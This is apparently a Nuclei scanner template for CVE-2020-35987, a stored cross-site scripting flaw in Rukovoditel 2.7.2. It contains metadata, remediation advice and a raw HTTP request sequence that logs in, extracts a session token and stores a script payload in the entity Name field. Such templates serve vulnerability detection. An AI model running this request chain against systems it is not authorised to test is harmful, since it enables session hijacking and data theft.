id: CVE-2020-35987

info:
  name: Rukovoditel <= 2.7.2 - Cross-Site Scripting
  author: r3Y3r53
  severity: medium
  description: |
    A stored cross site scripting (XSS) vulnerability in the 'Entities List' feature of Rukovoditel 2.7.2 allows authenticated attackers to execute arbitrary web scripts or HTML via a crafted payload entered into the 'Name' parameter.
  impact: |
    Successful exploitation of this vulnerability could allow an attacker to execute arbitrary JavaScript code in the context of the victim's browser, leading to potential data theft, session hijacking, or defacement of the affected application.
  remediation: |
    Upgrade Rukovoditel to a version higher than 2.7.2 or apply the vendor-provided patch to mitigate the XSS vulnerability.
  reference:
    - https://github.com/r0ck3t1973/rukovoditel/issues/1
    - http://rukovoditel.com/
    - https://nvd.nist.gov/vuln/detail/CVE-2020-35987
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2020-35987
    cwe-id: CWE-79
    epss-score: 0.00127
    epss-percentile: 0.47131
    cpe: cpe:2.3:a:rukovoditel:rukovoditel:2.7.2:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: rukovoditel
    product: rukovoditel
  tags: cve,cve2020,rukovoditel,xss,stored-xss,authenticated

http:
  - raw:
      - |
        GET /index.php?module=users/login HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /index.php?module=users/login&action=login HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        form_session_token={{nonce}}&username={{username}}&password={{password}}
      - |
        POST /index.php?module=entities/&action=save HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        form_session_token={{nonce}}&name=%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E&sort_order=0&notes=test

    redirects: true
    matchers:
      - type: dsl
        dsl:
          - 'status_code_3 == 200'
          - 'contains(content_type_3, "text/html")'
          - 'contains(body_3, "<script>alert(document.domain)</script>")'
          - 'contains(body_3, "rukovoditel")'
        condition: and

    extractors:
      - type: regex
        name: nonce
        group: 1
        regex:
          - 'id="form_session_token" value="(.*)" type="hidden"'
        internal: true
# digest: 4a0a0047304502210092f6720b2a41b9819db2f64c5e4f20fccaf38c443c206baa89805c657fd002430220684784d2573cd3cf3b42bbd6aa163d177eff08e1d514423a898e50a7d4a4ecac:922c64590222798bb761d5b6d8e72950